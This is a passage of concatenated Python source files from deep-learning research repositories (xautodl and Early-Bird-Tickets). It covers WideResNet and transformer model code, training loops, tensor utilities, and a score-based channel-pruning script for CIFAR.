)
self.num_classes = num_classes
self.dropout = dropout
self.conv_3x3 = nn.Conv2d(3, 16, kernel_size=3, stride=1, padding=1, bias=False)
self.message = "Wide ResNet : depth={:}, widen_factor={:}, class={:}".format(
depth, widen_factor, num_classes
)
self.inplanes = 16
self.stage_1 = self._make_layer(
WideBasicblock, 16 * widen_factor, layer_blocks, 1
)
self.stage_2 = self._make_layer(
WideBasicblock, 32 * widen_factor, layer_blocks, 2
)
self.stage_3 = self._make_layer(
WideBasicblock, 64 * widen_factor, layer_blocks, 2
)
self.lastact = nn.Sequential(
nn.BatchNorm2d(64 * widen_factor), nn.ReLU(inplace=True)
)
self.avgpool = nn.AvgPool2d(8)
self.classifier = nn.Linear(64 * widen_factor, num_classes)
self.apply(initialize_resnet)
def get_message(self):
return self.message
def _make_layer(self, block, planes, blocks, stride):
layers = []
layers.append(block(self.inplanes, planes, stride, self.dropout))
self.inplanes = planes
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, 1, self.dropout))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv_3x3(x)
x = self.stage_1(x)
x = self.stage_2(x)
x = self.stage_3(x)
x = self.lastact(x)
x = self.avgpool(x)
features = x.view(x.size(0), -1)
outs = self.classifier(features)
return features, outs
```
#### File: xautodl/models/initialization.py
```python
import torch
import torch.nn as nn
def initialize_resnet(m):
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode="fan_out", nonlinearity="relu")
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
```
#### File: models/shape_infers/shared_utils.py
```python
def parse_channel_info(xstring):
blocks = xstring.split(" ")
blocks = [x.split("-") for x in blocks]
blocks = [[int(_) for _ in x] for x in blocks]
return blocks
```
#### File: xautodl/procedures/advanced_main.py
```python
import os, sys, time, torch
from typing import Optional, Text, Callable
# modules in AutoDL
from xautodl.log_utils import AverageMeter, time_string
from .eval_funcs import obtain_accuracy
def get_device(tensors):
if isinstance(tensors, (list, tuple)):
return get_device(tensors[0])
elif isinstance(tensors, dict):
for key, value in tensors.items():
return get_device(value)
else:
return tensors.device
def basic_train_fn(
xloader,
network,
criterion,
optimizer,
metric,
logger,
):
results = procedure(
xloader,
network,
criterion,
optimizer,
metric,
"train",
logger,
)
return results
def basic_eval_fn(xloader, network, metric, logger):
with torch.no_grad():
results = procedure(
xloader,
network,
None,
None,
metric,
"valid",
logger,
)
return results
def procedure(
xloader,
network,
criterion,
optimizer,
metric,
mode: Text,
logger_fn: Callable = None,
):
data_time, batch_time = AverageMeter(), AverageMeter()
if mode.lower() == "train":
network.train()
elif mode.lower() == "valid":
network.eval()
else:
raise ValueError("The mode is not right : {:}".format(mode))
end = time.time()
for i, (inputs, targets) in enumerate(xloader):
# measure data loading time
data_time.update(time.time() - end)
# calculate prediction and loss
if mode == "train":
optimizer.zero_grad()
outputs = network(inputs)
targets = targets.to(get_device(outputs))
if mode == "train":
loss = criterion(outputs, targets)
loss.backward()
optimizer.step()
# record
with torch.no_grad():
results = metric(outputs, targets)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
return metric.get_info()
```
#### File: xautodl/spaces/basic_op.py
```python
from .basic_space import Space
from .basic_space import VirtualNode
from .basic_space import Integer
from .basic_space import Continuous
from .basic_space import Categorical
from .basic_space import _EPS
def has_categorical(space_or_value, x):
if isinstance(space_or_value, Space):
return space_or_value.has(x)
else:
return space_or_value == x
def has_continuous(space_or_value, x):
if isinstance(space_or_value, Space):
return space_or_value.has(x)
else:
return abs(space_or_value - x) <= _EPS
def is_determined(space_or_value):
if isinstance(space_or_value, Space):
return space_or_value.determined
else:
return True
def get_determined_value(space_or_value):
if not is_determined(space_or_value):
raise ValueError("This input is not determined: {:}".format(space_or_value))
if isinstance(space_or_value, Space):
if isinstance(space_or_value, Continuous):
return space_or_value.lower
elif isinstance(space_or_value, Categorical):
return get_determined_value(space_or_value[0])
else: # VirtualNode
return space_or_value.value
else:
return space_or_value
def get_max(space_or_value):
if isinstance(space_or_value, Integer):
return max(space_or_value.candidates)
elif isinstance(space_or_value, Continuous):
return space_or_value.upper
elif isinstance(space_or_value, Categorical):
values = []
for index in range(len(space_or_value)):
max_value = get_max(space_or_value[index])
values.append(max_value)
return max(values)
else:
return space_or_value
def get_min(space_or_value):
if isinstance(space_or_value, Integer):
return min(space_or_value.candidates)
elif isinstance(space_or_value, Continuous):
return space_or_value.lower
elif isinstance(space_or_value, Categorical):
values = []
for index in range(len(space_or_value)):
min_value = get_min(space_or_value[index])
values.append(min_value)
return min(values)
else:
return space_or_value
```
#### File: xautodl/trade_models/quant_transformer.py
```python
from __future__ import division
from __future__ import print_function
import os, math, random
from collections import OrderedDict
import numpy as np
import pandas as pd
from typing import Text, Union
import copy
from functools import partial
from typing import Optional, Text
from qlib.utils import get_or_create_path
from qlib.log import get_module_logger
import torch
import torch.nn.functional as F
import torch.optim as optim
import torch.utils.data as th_data
from xautodl.xmisc import AverageMeter
from xautodl.xmisc import count_parameters
from xautodl.xlayers import super_core
from .transformers import DEFAULT_NET_CONFIG
from .transformers import get_transformer
from qlib.model.base import Model
from qlib.data.dataset import DatasetH
from qlib.data.dataset.handler import DataHandlerLP
DEFAULT_OPT_CONFIG = dict(
epochs=200,
lr=0.001,
batch_size=2000,
early_stop=20,
loss="mse",
optimizer="adam",
num_workers=4,
)
def train_or_test_epoch(
xloader, model, loss_fn, metric_fn, is_train, optimizer, device
):
if is_train:
model.train()
else:
model.eval()
score_meter, loss_meter = AverageMeter(), AverageMeter()
for ibatch, (feats, labels) in enumerate(xloader):
feats, labels = feats.to(device), labels.to(device)
# forward the network
preds = model(feats)
loss = loss_fn(preds, labels)
with torch.no_grad():
score = metric_fn(preds, labels)
loss_meter.update(loss.item(), feats.size(0))
score_meter.update(score.item(), feats.size(0))
# optimize the network
if is_train and optimizer is not None:
optimizer.zero_grad()
loss.backward()
torch.nn.utils.clip_grad_value_(model.parameters(), 3.0)
optimizer.step()
return loss_meter.avg, score_meter.avg
class QuantTransformer(Model):
"""Transformer-based Quant Model"""
def __init__(
self, net_config=None, opt_config=None, metric="", GPU=0, seed=None, **kwargs
):
# Set logger.
self.logger = get_module_logger("QuantTransformer")
self.logger.info("QuantTransformer PyTorch version...")
# set hyper-parameters.
self.net_config = net_config or DEFAULT_NET_CONFIG
self.opt_config = opt_config or DEFAULT_OPT_CONFIG
self.metric = metric
self.device = torch.device(
"cuda:{:}".format(GPU) if torch.cuda.is_available() and GPU >= 0 else "cpu"
)
self.seed = seed
self.logger.info(
"Transformer parameters setting:"
"\nnet_config : {:}"
"\nopt_config : {:}"
"\nmetric : {:}"
"\ndevice : {:}"
"\nseed : {:}".format(
self.net_config,
self.opt_config,
self.metric,
self.device,
self.seed,
)
)
if self.seed is not None:
random.seed(self.seed)
np.random.seed(self.seed)
torch.manual_seed(self.seed)
if self.use_gpu:
torch.cuda.manual_seed(self.seed)
torch.cuda.manual_seed_all(self.seed)
self.model = get_transformer(self.net_config)
self.model.set_super_run_type(super_core.SuperRunMode.FullModel)
self.logger.info("model: {:}".format(self.model))
self.logger.info("model size: {:.3f} MB".format(count_parameters(self.model)))
if self.opt_config["optimizer"] == "adam":
self.train_optimizer = optim.Adam(
self.model.parameters(), lr=self.opt_config["lr"]
)
elif self.opt_config["optimizer"] == "adam":
self.train_optimizer = optim.SGD(
self.model.parameters(), lr=self.opt_config["lr"]
)
else:
raise NotImplementedError(
"optimizer {:} is not supported!".format(optimizer)
)
self.fitted = False
self.model.to(self.device)
@property
def use_gpu(self):
return self.device != torch.device("cpu")
def to(self, device):
if device is None:
device = "cpu"
self.device = device
self.model.to(self.device)
# move the optimizer
for param in self.train_optimizer.state.values():
# Not sure there are any global tensors in the state dict
if isinstance(param, torch.Tensor):
param.data = param.data.to(device)
if param._grad is not None:
param._grad.data = param._grad.data.to(device)
elif isinstance(param, dict):
for subparam in param.values():
if isinstance(subparam, torch.Tensor):
subparam.data = subparam.data.to(device)
if subparam._grad is not None:
subparam._grad.data = subparam._grad.data.to(device)
def loss_fn(self, pred, label):
mask = ~torch.isnan(label)
if self.opt_config["loss"] == "mse":
return F.mse_loss(pred[mask], label[mask])
else:
raise ValueError("unknown loss `{:}`".format(self.loss))
def metric_fn(self, pred, label):
# the metric score : higher is better
if self.metric == "" or self.metric == "loss":
return -self.loss_fn(pred, label)
else:
raise ValueError("unknown metric `{:}`".format(self.metric))
def fit(
self,
dataset: DatasetH,
save_dir: Optional[Text] = None,
):
def _prepare_dataset(df_data):
return th_data.TensorDataset(
torch.from_numpy(df_data["feature"].values).float(),
torch.from_numpy(df_data["label"].values).squeeze().float(),
)
def _prepare_loader(dataset, shuffle):
return th_data.DataLoader(
dataset,
batch_size=self.opt_config["batch_size"],
drop_last=False,
pin_memory=True,
num_workers=self.opt_config["num_workers"],
shuffle=shuffle,
)
df_train, df_valid, df_test = dataset.prepare(
["train", "valid", "test"],
col_set=["feature", "label"],
data_key=DataHandlerLP.DK_L,
)
train_dataset, valid_dataset, test_dataset = (
_prepare_dataset(df_train),
_prepare_dataset(df_valid),
_prepare_dataset(df_test),
)
train_loader, valid_loader, test_loader = (
_prepare_loader(train_dataset, True),
_prepare_loader(valid_dataset, False),
_prepare_loader(test_dataset, False),
)
save_dir = get_or_create_path(save_dir, return_dir=True)
self.logger.info(
"Fit procedure for [{:}] with save path={:}".format(
self.__class__.__name__, save_dir
)
)
def _internal_test(ckp_epoch=None, results_dict=None):
with torch.no_grad():
shared_kwards = {
"model": self.model,
"loss_fn": self.loss_fn,
"metric_fn": self.metric_fn,
"is_train": False,
"optimizer": None,
"device": self.device,
}
train_loss, train_score = train_or_test_epoch(
train_loader, **shared_kwards
)
valid_loss, valid_score = train_or_test_epoch(
valid_loader, **shared_kwards
)
test_loss, test_score = train_or_test_epoch(
test_loader, **shared_kwards
)
xstr = (
"train-score={:.6f}, valid-score={:.6f}, test-score={:.6f}".format(
train_score, valid_score, test_score
)
)
if ckp_epoch is not None and isinstance(results_dict, dict):
results_dict["train"][ckp_epoch] = train_score
results_dict["valid"][ckp_epoch] = valid_score
results_dict["test"][ckp_epoch] = test_score
return dict(train=train_score, valid=valid_score, test=test_score), xstr
# Pre-fetch the potential checkpoints
ckp_path = os.path.join(save_dir, "{:}.pth".format(self.__class__.__name__))
if os.path.exists(ckp_path):
ckp_data = torch.load(ckp_path, map_location=self.device)
stop_steps, best_score, best_epoch = (
ckp_data["stop_steps"],
ckp_data["best_score"],
ckp_data["best_epoch"],
)
start_epoch, best_param = ckp_data["start_epoch"], ckp_data["best_param"]
results_dict = ckp_data["results_dict"]
self.model.load_state_dict(ckp_data["net_state_dict"])
self.train_optimizer.load_state_dict(ckp_data["opt_state_dict"])
self.logger.info("Resume from existing checkpoint: {:}".format(ckp_path))
else:
stop_steps, best_score, best_epoch = 0, -np.inf, -1
start_epoch, best_param = 0, None
results_dict = dict(
train=OrderedDict(), valid=OrderedDict(), test=OrderedDict()
)
_, eval_str = _internal_test(-1, results_dict)
self.logger.info(
"Training from scratch, metrics@start: {:}".format(eval_str)
)
for iepoch in range(start_epoch, self.opt_config["epochs"]):
self.logger.info(
"Epoch={:03d}/{:03d} ::==>> Best valid @{:03d} ({:.6f})".format(
iepoch, self.opt_config["epochs"], best_epoch, best_score
)
)
train_loss, train_score = train_or_test_epoch(
train_loader,
self.model,
self.loss_fn,
self.metric_fn,
True,
self.train_optimizer,
self.device,
)
self.logger.info(
"Training :: loss={:.6f}, score={:.6f}".format(train_loss, train_score)
)
current_eval_scores, eval_str = _internal_test(iepoch, results_dict)
self.logger.info("Evaluating :: {:}".format(eval_str))
if current_eval_scores["valid"] > best_score:
stop_steps, best_epoch, best_score = (
0,
iepoch,
current_eval_scores["valid"],
)
best_param = copy.deepcopy(self.model.state_dict())
else:
stop_steps += 1
if stop_steps >= self.opt_config["early_stop"]:
self.logger.info(
"early stop at {:}-th epoch, where the best is @{:}".format(
iepoch, best_epoch
)
)
break
save_info = dict(
net_config=self.net_config,
opt_config=self.opt_config,
net_state_dict=self.model.state_dict(),
opt_state_dict=self.train_optimizer.state_dict(),
best_param=best_param,
stop_steps=stop_steps,
best_score=best_score,
best_epoch=best_epoch,
results_dict=results_dict,
start_epoch=iepoch + 1,
)
torch.save(save_info, ckp_path)
self.logger.info(
"The best score: {:.6f} @ {:02d}-th epoch".format(best_score, best_epoch)
)
self.model.load_state_dict(best_param)
_, eval_str = _internal_test("final", results_dict)
self.logger.info("Reload the best parameter :: {:}".format(eval_str))
if self.use_gpu:
with torch.cuda.device(self.device):
torch.cuda.empty_cache()
self.fitted = True
def predict(self, dataset: DatasetH, segment: Union[Text, slice] = "test"):
if not self.fitted:
raise ValueError("The model is not fitted yet!")
x_test = dataset.prepare(
segment, col_set="feature", data_key=DataHandlerLP.DK_I
)
index = x_test.index
with torch.no_grad():
self.model.eval()
x_values = x_test.values
sample_num, batch_size = x_values.shape[0], self.opt_config["batch_size"]
preds = []
for begin in range(sample_num)[::batch_size]:
if sample_num - begin < batch_size:
end = sample_num
else:
end = begin + batch_size
x_batch = torch.from_numpy(x_values[begin:end]).float().to(self.device)
with torch.no_grad():
pred = self.model(x_batch).detach().cpu().numpy()
preds.append(pred)
return pd.Series(np.concatenate(preds), index=index)
```
#### File: xautodl/xlayers/super_utils.py
```python
import abc
import warnings
from typing import Optional, Union, Callable
import torch
import torch.nn as nn
from enum import Enum
from xautodl import spaces
IntSpaceType = Union[int, spaces.Integer, spaces.Categorical]
BoolSpaceType = Union[bool, spaces.Categorical]
class LayerOrder(Enum):
"""This class defines the enumerations for order of operation in a residual or normalization-based layer."""
PreNorm = "pre-norm"
PostNorm = "post-norm"
class SuperRunMode(Enum):
"""This class defines the enumerations for Super Model Running Mode."""
FullModel = "fullmodel"
Candidate = "candidate"
Default = "fullmodel"
class ShapeContainer:
"""A class to maintain the shape of each weight tensor for a model."""
def __init__(self):
self._names = []
self._shapes = []
self._name2index = dict()
self._param_or_buffers = []
@property
def shapes(self):
return self._shapes
def __getitem__(self, index):
return self._shapes[index]
def translate(self, tensors, all_none_match=True):
result = TensorContainer()
for index, name in enumerate(self._names):
cur_num = tensors[index].numel()
expected_num = self._shapes[index].numel()
if cur_num < expected_num or (
cur_num > expected_num and not all_none_match
):
raise ValueError("Invalid {:} vs {:}".format(cur_num, expected_num))
cur_tensor = tensors[index].view(-1)[:expected_num]
new_tensor = torch.reshape(cur_tensor, self._shapes[index])
result.append(name, new_tensor, self._param_or_buffers[index])
return result
def append(self, name, shape, param_or_buffer):
if not isinstance(shape, torch.Size):
raise TypeError(
"The input tensor must be torch.Size instead of {:}".format(type(shape))
)
self._names.append(name)
self._shapes.append(shape)
self._param_or_buffers.append(param_or_buffer)
assert name not in self._name2index, "The [{:}] has already been added.".format(
name
)
self._name2index[name] = len(self._names) - 1
def query(self, name):
if not self.has(name):
raise ValueError(
"The {:} is not in {:}".format(name, list(self._name2index.keys()))
)
index = self._name2index[name]
return self._shapes[index]
def has(self, name):
return name in self._name2index
def has_prefix(self, prefix):
for name, idx in self._name2index.items():
if name.startswith(prefix):
return name
return False
def numel(self, index=None):
if index is None:
shapes = self._shapes
else:
shapes = [self._shapes[index]]
total = 0
for shape in shapes:
total += shape.numel()
return total
def __len__(self):
return len(self._names)
def __repr__(self):
return "{name}({num} tensors)".format(
name=self.__class__.__name__, num=len(self)
)
class TensorContainer:
"""A class to maintain both parameters and buffers for a model."""
def __init__(self):
self._names = []
self._tensors = []
self._param_or_buffers = []
self._name2index = dict()
def additive(self, tensors):
result = TensorContainer()
for index, name in enumerate(self._names):
new_tensor = self._tensors[index] + tensors[index]
result.append(name, new_tensor, self._param_or_buffers[index])
return result
def create_container(self, tensors):
result = TensorContainer()
for index, name in enumerate(self._names):
new_tensor = tensors[index]
result.append(name, new_tensor, self._param_or_buffers[index])
return result
def no_grad_clone(self):
result = TensorContainer()
with torch.no_grad():
for index, name in enumerate(self._names):
result.append(
name, self._tensors[index].clone(), self._param_or_buffers[index]
)
return result
def to_shape_container(self):
result = ShapeContainer()
for index, name in enumerate(self._names):
result.append(
name, self._tensors[index].shape, self._param_or_buffers[index]
)
return result
def requires_grad_(self, requires_grad=True):
for tensor in self._tensors:
tensor.requires_grad_(requires_grad)
def parameters(self):
return self._tensors
@property
def tensors(self):
return self._tensors
def flatten(self, tensors=None):
if tensors is None:
tensors = self._tensors
tensors = [tensor.view(-1) for tensor in tensors]
return torch.cat(tensors)
def unflatten(self, tensor):
tensors, s = [], 0
for raw_tensor in self._tensors:
length = raw_tensor.numel()
x = torch.reshape(tensor[s : s + length], shape=raw_tensor.shape)
tensors.append(x)
s += length
return tensors
def append(self, name, tensor, param_or_buffer):
if not isinstance(tensor, torch.Tensor):
raise TypeError(
"The input tensor must be torch.Tensor instead of {:}".format(
type(tensor)
)
)
self._names.append(name)
self._tensors.append(tensor)
self._param_or_buffers.append(param_or_buffer)
assert name not in self._name2index, "The [{:}] has already been added.".format(
name
)
self._name2index[name] = len(self._names) - 1
def query(self, name):
if not self.has(name):
raise ValueError(
"The {:} is not in {:}".format(name, list(self._name2index.keys()))
)
index = self._name2index[name]
return self._tensors[index]
def has(self, name):
return name in self._name2index
def has_prefix(self, prefix):
for name, idx in self._name2index.items():
if name.startswith(prefix):
return name
return False
def numel(self):
total = 0
for tensor in self._tensors:
total += tensor.numel()
return total
def __len__(self):
return len(self._names)
def __repr__(self):
return "{name}({num} tensors)".format(
name=self.__class__.__name__, num=len(self)
)
```
#### File: xautodl/xmisc/__init__.py
```python
from .module_utils import call_by_dict
from .module_utils import call_by_yaml
from .module_utils import nested_call_by_dict
from .module_utils import nested_call_by_yaml
from .yaml_utils import load_yaml
from .torch_utils import count_parameters
from .logger_utils import Logger
"""The data sampler related classes."""
from .sampler_utils import BatchSampler
"""The meter related classes."""
from .meter_utils import AverageMeter
"""The scheduler related classes."""
from .scheduler_utils import CosineParamScheduler, WarmupParamScheduler, LRMultiplier
def get_scheduler(indicator, lr):
if indicator == "warm-cos":
multiplier = WarmupParamScheduler(
CosineParamScheduler(lr, lr * 1e-3),
warmup_factor=0.001,
warmup_length=0.05,
warmup_method="linear",
)
else:
raise ValueError("Unknown indicator: {:}".format(indicator))
return multiplier
```
#### File: xautodl/xmisc/logger_utils.py
```python
import sys
from pathlib import Path
from .time_utils import time_for_file, time_string
class Logger:
"""A logger used in xautodl."""
def __init__(self, root_dir, prefix="", log_time=True):
"""Create a summary writer logging to log_dir."""
self.root_dir = Path(root_dir)
self.log_dir = self.root_dir / "logs"
self.log_dir.mkdir(parents=True, exist_ok=True)
self._prefix = prefix
self._log_time = log_time
self.logger_path = self.log_dir / "{:}{:}.log".format(
self._prefix, time_for_file()
)
self._logger_file = open(self.logger_path, "w")
@property
def logger(self):
return self._logger_file
def log(self, string, save=True, stdout=False):
string = "{:} {:}".format(time_string(), string) if self._log_time else string
if stdout:
sys.stdout.write(string)
sys.stdout.flush()
else:
print(string)
if save:
self._logger_file.write("{:}\n".format(string))
self._logger_file.flush()
def close(self):
self._logger_file.close()
if self.writer is not None:
self.writer.close()
def __repr__(self):
return "{name}(dir={log_dir}, prefix={_prefix}, log_time={_log_time})".format(
name=self.__class__.__name__, **self.__dict__
)
```
#### File: xautodl/xmisc/torch_utils.py
```python
import torch
import torch.nn as nn
import numpy as np
def count_parameters(model_or_parameters, unit="mb"):
if isinstance(model_or_parameters, nn.Module):
counts = sum(np.prod(v.size()) for v in model_or_parameters.parameters())
elif isinstance(model_or_parameters, nn.Parameter):
counts = models_or_parameters.numel()
elif isinstance(model_or_parameters, (list, tuple)):
counts = sum(count_parameters(x, None) for x in models_or_parameters)
else:
counts = sum(np.prod(v.size()) for v in model_or_parameters)
if unit.lower() == "kb" or unit.lower() == "k":
counts /= 1e3
elif unit.lower() == "mb" or unit.lower() == "m":
counts /= 1e6
elif unit.lower() == "gb" or unit.lower() == "g":
counts /= 1e9
elif unit is not None:
raise ValueError("Unknow unit: {:}".format(unit))
return counts
```
#### File: xautodl/xmisc/yaml_utils.py
```python
import os
import yaml
def load_yaml(path):
if not os.path.isfile(path):
raise ValueError("{:} is not a file.".format(path))
with open(path, "r") as stream:
data = yaml.safe_load(stream)
return data
```
#### File: xautodl/xmodels/transformers_quantum.py
```python
import copy, math
from functools import partial
from typing import Optional, Text, List
import torch
import torch.nn as nn
import torch.nn.functional as F
from xautodl import spaces
from xautodl import xlayers
from xautodl.xlayers import weight_init
class SuperQuaT(xlayers.SuperModule):
"""The super transformer for transformer."""
def __init__(
self,
image_size,
patch_size,
num_classes,
dim,
depth,
heads,
mlp_multiplier=4,
channels=3,
dropout=0.0,
att_dropout=0.0,
):
super(SuperQuaT, self).__init__()
image_height, image_width = pair(image_size)
patch_height, patch_width = pair(patch_size)
if image_height % patch_height != 0 or image_width % patch_width != 0:
raise ValueError("Image dimensions must be divisible by the patch size.")
num_patches = (image_height // patch_height) * (image_width // patch_width)
patch_dim = channels * patch_height * patch_width
self.to_patch_embedding = xlayers.SuperSequential(
xlayers.SuperReArrange(
"b c (h p1) (w p2) -> b (h w) (p1 p2 c)",
p1=patch_height,
p2=patch_width,
),
xlayers.SuperLinear(patch_dim, dim),
)
self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim))
self.cls_token = nn.Parameter(torch.randn(1, 1, dim))
self.dropout = nn.Dropout(dropout)
# build the transformer encode layers
layers = []
for ilayer in range(depth):
layers.append(
xlayers.SuperTransformerEncoderLayer(
dim,
heads,
False,
mlp_multiplier,
dropout=dropout,
att_dropout=att_dropout,
)
)
self.backbone = xlayers.SuperSequential(*layers)
self.cls_head = xlayers.SuperSequential(
xlayers.SuperLayerNorm1D(dim), xlayers.SuperLinear(dim, num_classes)
)
weight_init.trunc_normal_(self.cls_token, std=0.02)
self.apply(_init_weights)
@property
def abstract_search_space(self):
raise NotImplementedError
def apply_candidate(self, abstract_child: spaces.VirtualNode):
super(SuperQuaT, self).apply_candidate(abstract_child)
raise NotImplementedError
def forward_candidate(self, input: torch.Tensor) -> torch.Tensor:
raise NotImplementedError
def forward_raw(self, input: torch.Tensor) -> torch.Tensor:
tensors = self.to_patch_embedding(input)
batch, seq, _ = tensors.shape
cls_tokens = self.cls_token.expand(batch, -1, -1)
feats = torch.cat((cls_tokens, tensors), dim=1)
feats = feats + self.pos_embedding[:, : seq + 1, :]
feats = self.dropout(feats)
feats = self.backbone(feats)
x = feats[:, 0] # the features for cls-token
return self.cls_head(x)
def get_transformer(config):
if isinstance(config, str) and config.lower() in name2config:
config = name2config[config.lower()]
if not isinstance(config, dict):
raise ValueError("Invalid Configuration: {:}".format(config))
model_type = config.get("type", "vit").lower()
if model_type == "vit":
model = SuperQuaT(
image_size=config.get("image_size"),
patch_size=config.get("patch_size"),
num_classes=config.get("num_classes"),
dim=config.get("dim"),
depth=config.get("depth"),
heads=config.get("heads"),
dropout=config.get("dropout"),
att_dropout=config.get("att_dropout"),
)
else:
raise ValueError("Unknown model type: {:}".format(model_type))
return model
``` |
{
"source": "Joey61Liuyi/Early-Bird-Tickets",
"score": 2
} |
#### File: Joey61Liuyi/Early-Bird-Tickets/score_prove.py
```python
import argparse
import random
import numpy as np
import os
import torch
import torch.nn as nn
from torch.autograd import Variable
from torchvision import datasets, transforms
import wandb
# from models import *
import models
# os.environ['CUDA_VISIBLE_DEVICES'] = '4'
import copy
from score_based_pruning import reset_seed
from model_complexity import get_model_infos
def check_score(model, train_loader):
test_batch_size = 128
newmodel = copy.deepcopy(model)
reset_seed()
newmodel.K = np.zeros((test_batch_size, test_batch_size))
def counting_forward_hook(module, inp, out):
try:
if not module.visited_backwards:
return
if isinstance(inp, tuple):
inp = inp[0]
inp = inp.view(inp.size(0), -1)
x = (inp > 0).float()
K = x @ x.t()
K2 = (1. - x) @ (1. - x.t())
newmodel.K = newmodel.K + K.cpu().numpy() + K2.cpu().numpy()
except:
pass
def counting_backward_hook(module, inp, out):
module.visited_backwards = True
for name, module in newmodel.named_modules():
if 'ReLU' in str(type(module)):
# hooks[name] = module.register_forward_hook(counting_hook)
module.register_forward_hook(counting_forward_hook)
module.register_backward_hook(counting_backward_hook)
newmodel = newmodel.to(device)
s = []
for j in range(5):
data_iterator = iter(train_loader)
x, target = next(data_iterator)
x2 = torch.clone(x)
x2 = x2.to(device)
x, target = x.to(device), target.to(device)
jacobs, labels, y = get_batch_jacobian(newmodel, x, target, device)
newmodel(x2.to(device))
s_, ld = np.linalg.slogdet(newmodel.K)
s.append(ld)
score = np.mean(s)
return score
# Prune settings
parser = argparse.ArgumentParser(description='PyTorch Slimming CIFAR prune')
parser.add_argument('--dataset', type=str, default='cifar100',
help='training dataset (default: cifar10)')
parser.add_argument('--test-batch-size', type=int, default=128, metavar='N',
help='input batch size for testing (default: 256)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--depth', type=int, default=16,
help='depth of the vgg')
parser.add_argument('--percent', type=float, default=0.5,
help='scale sparse rate (default: 0.5)')
parser.add_argument('--model', default='', type=str, metavar='PATH',
help='path to the model (default: none)')
parser.add_argument('--save', default='./baseline/vgg16-cifar100', type=str, metavar='PATH',
help='path to save pruned model (default: none)')
parser.add_argument('--save_1', default='./baseline/vgg16-cifar100', type=str, metavar='PATH',
help='path to save pruned model (default: none)')
parser.add_argument('--start_epoch', default=1, type=int, metavar='N', help='manual start epoch number')
parser.add_argument('--end_epoch', default=160, type=int, metavar='N', help='manual end epoch number')
# quantized parameters
parser.add_argument('--bits_A', default=8, type=int, help='input quantization bits')
parser.add_argument('--bits_W', default=8, type=int, help='weight quantization bits')
parser.add_argument('--bits_G', default=8, type=int, help='gradient quantization bits')
parser.add_argument('--bits_E', default=8, type=int, help='error quantization bits')
parser.add_argument('--bits_R', default=16, type=int, help='rand number quantization bits')
parser.add_argument('--arch', default='vgg', type=str,
help='architecture to use')
# multi-gpus
parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
seed = 1
if not os.path.exists(args.save):
os.makedirs(args.save)
gpu = args.gpu_ids
gpu_ids = args.gpu_ids.split(',')
args.gpu_ids = []
for gpu_id in gpu_ids:
id = int(gpu_id)
if id > 0:
args.gpu_ids.append(id)
if len(args.gpu_ids) > 0:
torch.cuda.set_device(args.gpu_ids[0])
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def get_batch_jacobian(net, x, target, device):
net.zero_grad()
x.requires_grad_(True)
y = net(x)
y.backward(torch.ones_like(y))
jacob = x.grad.detach()
return jacob, target.detach(), y.detach()
if args.arch.endswith('lp'):
# model = models.__dict__[args.arch](bits_A=args.bits_A, bits_E=args.bits_E, bits_W=args.bits_W, dataset=args.dataset, depth=args.depth)
model = models.__dict__[args.arch](8, 8, 32, dataset=args.dataset, depth=args.depth)
elif args.dataset == 'imagenet':
model = models.__dict__[args.arch](pretrained=False)
if len(args.gpu_ids) > 1:
model = torch.nn.DataParallel(model, device_ids=args.gpu_ids)
else:
model = models.__dict__[args.arch](dataset=args.dataset, depth=args.depth)
if args.dataset == 'cifar10':
train_loader = torch.utils.data.DataLoader(
datasets.CIFAR10('./data.cifar10', train=True, download=True,
transform=transforms.Compose([
transforms.Pad(4),
transforms.RandomCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
])),
batch_size=args.test_batch_size, shuffle=True)
test_loader = torch.utils.data.DataLoader(
datasets.CIFAR10('./data.cifar10', train=False, transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
])),
batch_size=args.test_batch_size, shuffle=True)
else:
train_loader = torch.utils.data.DataLoader(
datasets.CIFAR100('./data.cifar100', train=True, download=True,
transform=transforms.Compose([
transforms.Pad(4),
transforms.RandomCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
])),
batch_size=args.test_batch_size, shuffle=True)
test_loader = torch.utils.data.DataLoader(
datasets.CIFAR100('./data.cifar100', train=False, transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
])),
batch_size=args.test_batch_size, shuffle=True)
def create_model(model, cfg, cfg_mask):
if args.arch.endswith('lp'):
# model = models.__dict__[args.arch](bits_A=args.bits_A, bits_E=args.bits_E, bits_W=args.bits_W, dataset=args.dataset, depth=args.depth)
newmodel = models.__dict__[args.arch](8, 8, 32, dataset=args.dataset, depth=args.depth)
elif args.dataset == 'imagenet':
newmodel = models.__dict__[args.arch](pretrained=False)
if len(args.gpu_ids) > 1:
model = torch.nn.DataParallel(model, device_ids=args.gpu_ids)
else:
newmodel = models.__dict__[args.arch](dataset=args.dataset, cfg = cfg)
layer_id_in_cfg = 0
start_mask = torch.ones(3)
end_mask = cfg_mask[layer_id_in_cfg]
for [m0, m1] in zip(model.modules(), newmodel.modules()):
if isinstance(m0, nn.BatchNorm2d):
if torch.sum(end_mask) == 0:
continue
idx1 = np.squeeze(np.argwhere(np.asarray(end_mask.cpu().numpy())))
if idx1.size == 1:
idx1 = np.resize(idx1, (1,))
m1.weight.data = m0.weight.data[idx1.tolist()].clone()
m1.bias.data = m0.bias.data[idx1.tolist()].clone()
